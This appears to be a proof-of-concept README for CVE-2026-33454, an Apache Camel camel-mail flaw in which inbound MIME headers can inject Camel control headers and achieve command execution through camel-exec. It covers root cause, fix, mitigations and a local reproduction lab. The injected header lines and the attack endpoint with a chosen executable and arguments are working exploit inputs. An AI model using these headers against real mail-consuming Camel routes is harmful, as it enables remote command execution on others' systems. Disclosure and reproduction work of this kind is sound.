Share
## https://sploitus.com/exploit?id=1795EF89-D6B7-578E-9A35-5D6A5BBA5B03
# camel-mail Header Injection โ†’ RCE Vulnerability Reproducer (CVE-2026-33454)

This project demonstrates a **Camel message header injection** vulnerability in Apache Camel's
`camel-mail` component, tracked as **CVE-2026-33454**. An attacker who can deliver an email to a
mailbox monitored by a Camel mail consumer can inject `Camel*` control headers into the Exchange,
achieving **remote code execution** when the route forwards to a header-sensitive producer such as
`camel-exec`.

Advisory: https://camel.apache.org/security/CVE-2026-33454.html

## Vulnerability Summary

| Property | Value |
|----------|-------|
| **Component** | `camel-mail` |
| **Affected Class** | `org.apache.camel.component.mail.MailHeaderFilterStrategy` (+ `MailBinding.extractHeadersFromMail`) |
| **Root cause** | The filter strategy configures only the OUT direction (`setOutFilterStartsWith`) and NOT the IN direction, so inbound MIME headers are not filtered |
| **CWE** | CWE-20: Improper Input Validation (Camel message header injection) |
| **Impact** | Remote Code Execution (via header-sensitive producers, e.g. camel-exec) |
| **Affected Versions** | From 3.0.0 before 4.14.6, and from 4.15.0 before 4.18.1 |
| **Fixed Versions** | 4.14.6, 4.18.1, 4.19.0 |
| **JIRA** | CAMEL-23222 |
| **Reporter** | Hyunwoo Kim (@v4bel) |

## Technical Details

`MailHeaderFilterStrategy` extends `DefaultHeaderFilterStrategy`. In affected versions its constructor
configures only the **out** filter and never sets the **in** filter:

```java
// MailHeaderFilterStrategy - affected version (only the OUT direction is filtered)
public MailHeaderFilterStrategy() {
    setOutFilterStartsWith(CAMEL_FILTER_STARTS_WITH);   // OUT only
    // no setInFilterStartsWith(...) -> inbound Camel* headers are NOT filtered
}
```

When Camel consumes mail (e.g. `from("imap://...")` or `from("pop3://...")`),
`MailBinding.extractHeadersFromMail()` copies every MIME header into the Exchange In headers, gated by
`headerFilterStrategy.applyFilterToExternalHeaders(...)`. Because the **in** filter was never
configured, `Camel*`-prefixed MIME headers pass straight through:

```java
// MailBinding.extractHeadersFromMail() - the in-filter is not configured, so Camel* passes
Enumeration names = mailMessage.getAllHeaders();
...
boolean keep = !headerFilterStrategy.applyFilterToExternalHeaders(headerName, value, exchange);
if (keep) { answer.put(headerName, value); }
```

An attacker who can email the monitored mailbox can therefore set arbitrary `Camel*` control headers.
When the route forwards to a header-sensitive producer such as `camel-exec`, the
`CamelExecCommandExecutable` / `CamelExecCommandArgs` headers override the command (honoured by default
in the affected versions) โ†’ arbitrary OS command execution.

## The victim route

```java
from("imap://127.0.0.1:3143?username=victim&password=secret&delete=true&unseen=true")
    .to("exec:echo?args=hello")     // fixed, harmless command
    .convertBodyTo(String.class);
```

## Prerequisites

- Java 17+
- Maven 3.8+
- Docker (runs the mail server)

## Reproduction Steps

### Step 1: Start the mail server (Docker)

A GreenMail container provides SMTP (3025) and IMAP (3143) with a single mailbox
(login `victim`, password `secret`, address `victim@localhost`):

```bash
docker compose up -d
# or:
docker run -d --name greenmail-cve -p 3025:3025 -p 3143:3143 \
  -e GREENMAIL_OPTS='-Dgreenmail.setup.test.all -Dgreenmail.users=victim:secret@localhost -Dgreenmail.hostname=0.0.0.0 -Dgreenmail.auth.disabled -Dgreenmail.verbose' \
  greenmail/standalone:2.1.0
```

### Step 2: Build and Start the Application

```bash
mvn clean package -DskipTests
mvn spring-boot:run
```

Starts the IMAP victim route and a helper REST controller on 8080.

### Step 3: Benign Email (sanity check)

```bash
curl http://localhost:8080/exploit/normal
```

The consumer picks it up and runs `echo hello`.

### Step 4: Attack โ€” deliver an email with injected Camel* MIME headers

```bash
# default benign proof: touch /tmp/pwned
curl http://localhost:8080/exploit/attack

# or choose the executable/args:
curl "http://localhost:8080/exploit/attack?exe=/usr/bin/touch&args=/tmp/owned-by-mail"
```

This delivers an email whose MIME headers include:

```
CamelExecCommandExecutable: /usr/bin/touch
CamelExecCommandArgs: /tmp/pwned
```

### Step 5: Verify

```bash
# wait ~2s for the IMAP poll cycle, then:
ls -la /tmp/pwned
```

If `/tmp/pwned` exists, the injected MIME header overrode the exec command โ†’ RCE.

### Cleanup

```bash
docker compose down    # or: docker rm -f greenmail-cve
```

## Attack Vectors

The injection only needs a header-sensitive producer downstream. The advisory notes camel-bean,
camel-exec and camel-sql; more broadly:

- **camel-exec** โ€” `CamelExecCommandExecutable` / `CamelExecCommandArgs` โ†’ OS command execution
- **camel-file** โ€” `CamelFileName` โ†’ arbitrary file write / path traversal
- **camel-bean** โ€” `CamelBeanMethodName` โ†’ invoke a different method
- **camel-sql** โ€” query-control headers

## Exploit Conditions

1. A Camel route consuming mail (`imap://`, `imaps://`, `pop3://`, ...).
2. The route forwards to (or is influenced by) a header-sensitive producer.
3. No `removeHeaders("Camel*")` between the mail consumer and that producer.

The attacker only needs to be able to send an email to the monitored mailbox.

## Recommended Fix

The fix (CAMEL-23222) configures the inbound filter as well:

```java
public MailHeaderFilterStrategy() {
    setOutFilterStartsWith(CAMEL_FILTER_STARTS_WITH);
    String[] inFilter = Arrays.copyOf(CAMEL_FILTER_STARTS_WITH, CAMEL_FILTER_STARTS_WITH.length + 2);
    inFilter[CAMEL_FILTER_STARTS_WITH.length]     = "mail.smtp.";
    inFilter[CAMEL_FILTER_STARTS_WITH.length + 1] = "mail.smtps.";
    setInFilterStartsWith(inFilter);   // now the inbound direction is filtered too
}
```

## Mitigation

Until upgrading:

1. **Strip Camel headers** from mail-sourced messages: `.removeHeaders("Camel*")` right after the
   `from("imap:...")`.
2. **Avoid header-sensitive producers** downstream of untrusted mail, or pin their configuration.
3. **Restrict who can deliver** to the monitored mailbox.

## Files

```
CVE-2026-33454/
โ”œโ”€โ”€ pom.xml
โ”œโ”€โ”€ docker-compose.yml               # GreenMail mail server (SMTP 3025 / IMAP 3143)
โ”œโ”€โ”€ README.md
โ””โ”€โ”€ src/main/
    โ”œโ”€โ”€ java/com/example/
    โ”‚   โ”œโ”€โ”€ Application.java          # Spring Boot entry point
    โ”‚   โ”œโ”€โ”€ MailExecRoute.java        # the vulnerable victim route (imap -> exec)
    โ”‚   โ””โ”€โ”€ ExploitController.java    # attacker: delivers the malicious email via SMTP
    โ””โ”€โ”€ resources/
        โ””โ”€โ”€ application.properties
```

## Disclaimer

This reproducer is provided for **security research and authorized testing only**, for a **publicly
disclosed and fixed** vulnerability. Do not use it against systems without explicit permission.